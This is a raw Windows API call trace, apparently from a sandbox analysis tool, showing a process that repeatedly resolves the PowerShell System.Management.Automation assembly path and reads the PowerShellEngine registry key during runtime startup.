	[0239.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.413] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da28 | out: phkResult=0x12da28*=0x15c) returned 0x0
	[0239.413] RegQueryValueExW (in: hKey=0x15c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d9ac, lpData=0x0, lpcbData=0x12d9a8*=0x0 | out: lpType=0x12d9ac*=0x1, lpData=0x0, lpcbData=0x12d9a8*=0x56) returned 0x0
	[0239.413] CoTaskMemAlloc (cb=0x5a) returned 0x1b964c80
	[0239.413] RegQueryValueExW (in: hKey=0x15c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d97c, lpData=0x1b964c80, lpcbData=0x12d978*=0x56 | out: lpType=0x12d97c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d978*=0x56) returned 0x0
	[0239.413] CoTaskMemFree (pv=0x1b964c80) 
	[0239.414] RegCloseKey (hKey=0x15c) returned 0x0
	[0239.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.422] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0239.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0239.422] CoTaskMemFree (pv=0x3839f0) 
	[0239.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0239.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
